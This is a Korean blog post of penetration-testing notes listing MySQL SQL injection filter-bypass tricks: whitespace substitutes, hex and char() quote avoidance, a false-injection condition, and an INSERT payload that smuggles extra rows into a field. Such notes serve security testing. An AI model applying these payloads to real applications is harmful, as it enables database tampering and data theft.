반응형
출처: http://hyunmini.tistory.com/47
# 공백 우회
- /**/
- %09, %0d, %0a
- select`id`from`user`
# ' 우회
- concat(char(49),char(50)) = '12'
- char(0x31,0x32,0x33) = '123'
- 0x41424344 = 'abcd'
- x'41424344' = 'abcd'
- true + true =2
- where '1'=0 / False Injection, 1=1 과 동일함
# 함수 정리
unix_timestamp() -> '135461123'
inet_ntoa(2108797737) -> '125.177.179.41'
# insert injection
"a1','a2','a3'), ('b1','b2','b3'), ('c1"
insert into test values ('a','b','c')
=
insert into test select 'a','b','c'
# 키워드 우회
substr('abc',1,1) == right(left('abc',1),1)
substr('abc',2,1) == right(left('abc',2),1)
등...(정리중)
반응형
'프로젝트 관련 조사 > 모의 해킹' 카테고리의 다른 글
Filtering 발견 및 우회 테크닉 (0) | 2016.07.10 |
---|---|
SQL Injection(MySQL) - procedure analyze() (0) | 2016.07.10 |
SQL Injection Cheat Sheet - MySQL (0) | 2016.06.18 |
Union SQL Injection (0) | 2016.06.18 |
DDOS 공격대응 메뉴얼 (0) | 2016.04.26 |